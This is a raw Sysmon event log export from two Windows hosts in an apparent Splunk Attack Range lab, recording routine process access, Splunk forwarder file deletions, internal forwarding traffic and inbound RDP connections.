09:14:55.990{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050797Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:55.990{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-8B8F-6151-4D7A-00000000FC01}1020C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050796Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:55.990{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8B8F-6151-4D7A-00000000FC01}1020C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050795Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:55.985{5EBD8912-8B8F-6151-4D7A-00000000FC01}1020C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050808Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:57.587{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E8458AC72C5CE20F3BADF7D18AD9945,SHA256=47B2FC756D48C512D11F0AB66AF236BD03AC27E62DC2BF06DEDA7499216AFA84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979463Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:57.319{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DAA27CAF13304B0BA2FC81002E3A41C8,SHA256=BF2066787CDD6E13EB67A3AEDBA8BB04DFCB7E35A93646532173EAD26ACE57B8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979465Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:55.866{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59421-false10.0.1.12-8000- 23542300x8000000000000000979464Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:58.397{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79A51A85E117A3F20D395B957F772173,SHA256=F5B8AD85558911EE4149438308F83F8AC27CB3DD12112A654586B02541E932E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050810Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:58.651{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22319F7F48877C6FF8930BEDA525B73F,SHA256=0BDF52643B7DCFFD8445698CFCA3F7F26298F76B4242D74C2A8F41BB7DFB3E0D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050809Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:58.005{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=78919603B8FC6087A7AF3298B293FCD5,SHA256=3C20E728ED91E18DA0F3410B157A120191EB897BC679286C107F32999E9AC901,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979466Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:59.631{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C7A460AFFFBD9F81D1011C9E4F9AB0B,SHA256=1AB04AE17485BCD0075EA7ECC945A4B6138A586B2A820FB19681D8A0552928D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050813Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:59.685{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD880A62A2F03DB4F13E4764312FBC6B,SHA256=4D426C31278F013886F3DBF74D4B89B215E25C9A3ADCA7DAA57FE39EB46B5CA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050812Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:59.436{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4B12956E7E0B1276A40E66F26B329C36,SHA256=B27FF6F8CDDDF8B168B5BC2D06BB6CDCB9C21968D19F98DC55311224A89317A0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050811Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:59.251{5EBD8912-7F30-614D-0D00-00000000FC01}888416C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1600-00000000FC01}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000979467Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:00.725{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2ECF8C825F69AC10CA0ECC34655234F,SHA256=9C2AA23540584C72A171D03D7B153B1B9D7A9B00EF08CFA6C423CB3CC9209204,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050815Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:00.704{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4CFFDF2BC4C8F4DC8DD7F28C12E73F2,SHA256=37C345400B59F22D86F14C612B502101C02C8B9BEC606676E9313F3F680BB1AE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050814Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:56.874{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53410-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000979468Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:01.741{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4E9A7C3C08CB59BF7B4F84EB907003C,SHA256=6E6B38ECE091829125C6BF0BAF085A7D9E105AFEA6F82676FB0D106C81A8BDCD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050817Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:01.784{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B53BC247885C6178A103A29B950850B2,SHA256=8E9D2EB7086BA60AEE884A7FF6DD79C1968759EBBBC1E33B3BCAD1B2452A294C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050816Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:57.827{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-63569-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050818Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:02.821{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40A5BEEA9C5C6141FFDC3B43F303EDF6,SHA256=0ECF983D1719EEB5A4CC66756923D511CBB9A713665F9630CC2673703D875CD5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979469Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:02.756{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B34FE74BD8F3CFA8A4D49813DDD14176,SHA256=657D6C576E5D885C81171B8A7C51F27383A48AFC0665CEC40A8F1E0CAF603C31,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050819Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:03.833{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19B4498E13FC84017CAB1762DDE6E46F,SHA256=5DDAB904108CBBEE18839EECEBEFD20762A82BDCA36E28ADDB358B60D6A2E278,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979472Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:03.980{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D13FF434ADB2EEE5E2B5CDB5D8B8A507,SHA256=BA5B3A5E8DF68B7105E8CECE02A2DA099351DF0C1926F4361ADC102A85884301,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979471Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:03.355{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2A37BDAEEA84E762973F45DA5892684D,SHA256=19A9C7270AF98570F1AC1F18A2B031D70AECD3EDCC5CBF59352794912CA6B45F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979470Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:03.355{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3E38DB93A8051A022709AC11D66C32B0,SHA256=0B94289B78A300B8BB6BDF1FA52065E813999350DC03134F4D32328EDD11E1E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050820Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:04.933{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07F5DD006E2E5CDCE2E121412A6D53AF,SHA256=46E62F5BF19E83ACEBFF4E087EDD5C7430590A0ED44AF4A6AFCB26C08FE4AFC8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979473Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:59.992{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-55408-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001050825Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:05.964{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91FA90659AB24B04D5141E691ADE1999,SHA256=3E71B6E5410AA40EFD8083E35703682003BBC813E1E762DA9F9DBAC9DD738BF7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050824Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:03.465{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse13.235.255.213ec2-13-235-255-213.ap-south-1.compute.amazonaws.com58320-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001050823Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:02.857{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53411-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001050822Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:05.233{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=879B0BE00E00360BB5FB2696299CB513,SHA256=A7471714488BD9F280419AB46D70E80E8CB203D92675C962212D7BB51ECCA772,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050821Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:05.233{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=25AEE916EFAA136E0DBB69CC03B01986,SHA256=42CFC6C12960FF4C14A4916F8C51E46BC16718A30742FDEFF7C3DDC0CAC31FA2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979475Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:01.855{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59422-false10.0.1.12-8000- 23542300x8000000000000000979474Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:05.074{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5E5F1088F05C33DB1A003463235E244,SHA256=ACDD5CCCED8C56EFE385A05AC8DA343AFA9268EEAEE859E9B1EB95F9CEBF3D2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050826Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:06.966{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=011C46D9A6147FF005FBB1E6E718F1C7,SHA256=2B6811A6FFB906FB7920A0F62A725A30ACD395C404625F796B251CF56C8D45B1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979478Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:02.794{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-57044-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000979477Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:06.214{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2A37BDAEEA84E762973F45DA5892684D,SHA256=19A9C7270AF98570F1AC1F18A2B031D70AECD3EDCC5CBF59352794912CA6B45F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979476Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:06.214{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CFD1E3CCAF934E93EECFCBE0A0DBAAF,SHA256=1FBF0F7F194ACE8C4794B377B715FBE9D94B5F09FA7765C1A73AC22B54D56580,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000979483Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:07.714{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1500-00000000FD01}1172C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979482Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:07.714{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1500-00000000FD01}1172C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979481Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:07.714{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1500-00000000FD01}1172C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000979480Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:07.324{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE050CFFBD33F2E1AFA4E1088493EF64,SHA256=B01795FE24322A606B28839E0F853D602E2B11F17AA7046EEE18C5BB051C2A88,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979479Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:04.298{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-54465-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000979485Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:08.333{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC379C50F67457AB3FD9DFEA09AFFBAF,SHA256=7C78CD1616148187B5ACD62C199AA32871A0C821C1CB13B13FF4C8937035F566,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979484Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:08.331{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\respondent-20210924073259-4311MD5=C03F5A35DCD33CC76F546E3EA7D3F3DF,SHA256=27CB325E5A2A8D6C4E4022C2FAED9138BDF4BFE7B38BDA6EB79267B7EDAE26D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050827Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:08.004{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E35E557234356E01724512253CDC87EB,SHA256=11521DA4C4F53D42A43E1510ECA6B6DC290C92A22B04C6B414D079366EC50EFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979489Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 